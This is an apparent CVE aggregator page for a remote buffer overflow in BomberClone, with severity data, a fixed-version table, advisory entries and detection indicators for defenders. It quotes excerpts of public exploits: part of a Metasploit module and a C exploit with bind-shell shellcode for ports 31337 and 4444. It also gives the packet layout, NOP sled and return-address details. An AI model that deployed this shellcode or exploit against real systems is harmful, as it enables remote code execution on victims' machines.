CVE-2006-0460
published 2006-02-17CVE-2006-0460: Multiple buffer overflows in BomberClone before 0.11.6.2 allow remote attackers to execute arbitrary code via long error messages.
PriorityP350high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
67.75%
99.2th percentile
Multiple buffer overflows in BomberClone before 0.11.6.2 allow remote attackers to execute arbitrary code via long error messages.
Affected
23 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| bomberclone | bomberclone | — | — |
| bomberclone | bomberclone | — | — |
| bomberclone | bomberclone | — | — |
| bomberclone | bomberclone | — | — |
| bomberclone | bomberclone | — | — |
| bomberclone | bomberclone | — | — |
| bomberclone | bomberclone | — | — |
| bomberclone | bomberclone | — | — |
| bomberclone | bomberclone | — | — |
| bomberclone | bomberclone | — | — |
| bomberclone | bomberclone | — | — |
| bomberclone | bomberclone | — | — |
| bomberclone | bomberclone | — | — |
| bomberclone | bomberclone | — | — |
| bomberclone | bomberclone | — | — |
| bomberclone | bomberclone | — | — |
| bomberclone | bomberclone | — | — |
| bomberclone | bomberclone | — | — |
| bomberclone | bomberclone | >= 0 < 0.11.6.2-1 | 0.11.6.2-1 |
| bomberclone | bomberclone | >= 0 < 0.11.6.2-1 | 0.11.6.2-1 |
| bomberclone | bomberclone | >= 0 < 0.11.6.2-1 | 0.11.6.2-1 |
| bomberclone | bomberclone | >= 0 < 0.11.6.2-1 | 0.11.6.2-1 |
| debian | bomberclone | < bomberclone 0.11.6.2-1 (bookworm) | bomberclone 0.11.6.2-1 (bookworm) |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x00\x00\x00\x00\x38\x03\x41
bytes↗
\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02\x89\xe1\xcd\x80
bytes↗
\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x36
- →Detect oversized UDP packets to port 11000 beginning with the magic header bytes \x00\x00\x00\x00\x38\x03\x41 followed by a large NOP sled — characteristic of the BomberClone exploit. ↗
- →The exploit sends a malformed pkg_error packet (type=0x00, flags=0x00) over UDP with a text field of 816 bytes padded with 0x90 NOP bytes; monitor for anomalously large UDP datagrams to the BomberClone game port (default 11000). ↗
- →The Metasploit module uses a payload space of only 344 bytes with null byte as bad char; the NOP sled is 421 bytes prepended before the payload — look for UDP payloads with long NOP sleds on port 11000. ↗
- →The exploit overwrites the return address with lstrcpyA (ret-into-libc style); on Windows hosts running BomberClone, alert on unexpected lstrcpyA return-address values (0x7c80c729, 0x77e85f08, 0x77e95e8b) appearing in stack frames. ↗
- →Post-exploitation: watch for unexpected listening shells on TCP ports 31337 (Linux) or 4444 (Windows) spawned by the BomberClone process after receiving a malformed error packet. ↗
- ·The Metasploit shellcode only executes when the victim attempts to close BomberClone, not immediately upon receipt of the exploit packet — detection based solely on immediate post-exploitation activity may miss the trigger window. ↗
- ·The return addresses for the ret-into-libc technique are OS/SP-specific (XP SP2 Italian, Win2000 SP1 English variants); detections relying on specific RET values will not cover all target configurations. ↗
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
osv7.5HIGH
vendor_debian7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Debian
CVE-2006-0460: bomberclone - Multiple buffer overflows in BomberClone before 0.11.6.2 allow remote attackers ...
vendor_debian·2006·CVSS 7.5
CVE-2006-0460 [HIGH] CVE-2006-0460: bomberclone - Multiple buffer overflows in BomberClone before 0.11.6.2 allow remote attackers ...
Multiple buffer overflows in BomberClone before 0.11.6.2 allow remote attackers to execute arbitrary code via long error messages.
Scope: local
bookworm: resolved (fixed in 0.11.6.2-1)
bullseye: resolved (fixed in 0.11.6.2-1)
forky: resolved (fixed in 0.11.6.2-1)
sid: resolved (fixed in 0.11.6.2-1)
trixie: resolved (fixed in 0.11.6.2-1)
GHSA
GHSA-mcg7-6fhr-xjpc: Multiple buffer overflows in BomberClone before 0
ghsa_unreviewed·2022-05-01
CVE-2006-0460 [HIGH] GHSA-mcg7-6fhr-xjpc: Multiple buffer overflows in BomberClone before 0
Multiple buffer overflows in BomberClone before 0.11.6.2 allow remote attackers to execute arbitrary code via long error messages.
OSV
CVE-2006-0460: Multiple buffer overflows in BomberClone before 0
osv·2006-02-17·CVSS 7.5
CVE-2006-0460 [HIGH] CVE-2006-0460: Multiple buffer overflows in BomberClone before 0
Multiple buffer overflows in BomberClone before 0.11.6.2 allow remote attackers to execute arbitrary code via long error messages.
No detection rules found.
Exploit-DB
BomberClone 0.11.6 - Remote Buffer Overflow (Metasploit)
exploitdb·2010-04-30
CVE-2006-0460 BomberClone 0.11.6 - Remote Buffer Overflow (Metasploit)
BomberClone 0.11.6 - Remote Buffer Overflow (Metasploit)
---
##
# $Id: bomberclone_overflow.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Bomberclone 0.11.6 Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Bomberclone 0.11.6 for Windows.
The return address is overwritten with lstrcpyA memory address,
the second and third value are the destination buffer,
the fourth value is the source address of our buffer in the stack.
This exploit is like a return in libc.
ATTEN
Exploit-DB
BomberClone < 0.11.6.2 - Error Messages Remote Buffer Overflow
exploitdb·2006-03-22·CVSS 7.5
CVE-2006-0460 [HIGH] BomberClone < 0.11.6.2 - Error Messages Remote Buffer Overflow
BomberClone
#include
#include
#include
#include
#include
#include
#include
/* fork() + bind() port 31337 - ty izik */
char linux_shellcode[]=
"\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02\x89\xe1\xcd\x80"
"\x5b\x5d\x52\x66\xbd\x69\x7a\x0f\xcd\x09\xdd\x55\x6a\x10\x51"
"\x50\x89\xe1\xb0\x66\xcd\x80\xb3\x04\xb0\x66\xcd\x80\x5f\x50"
"\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80\x93\xb0\x02\xcd\x80\x85\xc0"
"\x75\x1a\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73"
"\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\xeb\xb2\x6a\x06\x58"
"\xcd\x80\xb3\x04\xeb\xc9";
/* bind shell to 4444 - metasploit */
char win32_shellcode[] =
"\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x36"
"\xbc\x74\xb1\x83\xeb\xfc\xe2\xf4\xca\xd6\x9f\xfc\xde\x45\x8b\x4e"
"\xc9\xdc\xff\xdd\x12\x98\xff\xf4\x0a\x37\x08
Metasploit
Bomberclone 0.11.6 Buffer Overflow
metasploit
Bomberclone 0.11.6 Buffer Overflow
Bomberclone 0.11.6 Buffer Overflow
This module exploits a stack buffer overflow in Bomberclone 0.11.6 for Windows. The return address is overwritten with lstrcpyA memory address, the second and third value are the destination buffer, the fourth value is the source address of our buffer in the stack. This exploit is like a return in libc. ATTENTION The shellcode is exec ONLY when someone try to close bomberclone.
No writeups or analysis indexed.
http://secunia.com/advisories/18914http://secunia.com/advisories/18915http://secunia.com/advisories/19210http://www.debian.org/security/2006/dsa-997http://www.gentoo.org/security/en/glsa/glsa-200602-09.xmlhttp://www.osvdb.org/23263http://www.securityfocus.com/bid/16697http://www.vupen.com/english/advisories/2006/0643https://exchange.xforce.ibmcloud.com/vulnerabilities/24764http://secunia.com/advisories/18914http://secunia.com/advisories/18915http://secunia.com/advisories/19210http://www.debian.org/security/2006/dsa-997http://www.gentoo.org/security/en/glsa/glsa-200602-09.xmlhttp://www.osvdb.org/23263http://www.securityfocus.com/bid/16697http://www.vupen.com/english/advisories/2006/0643https://exchange.xforce.ibmcloud.com/vulnerabilities/24764
2006-02-17
Published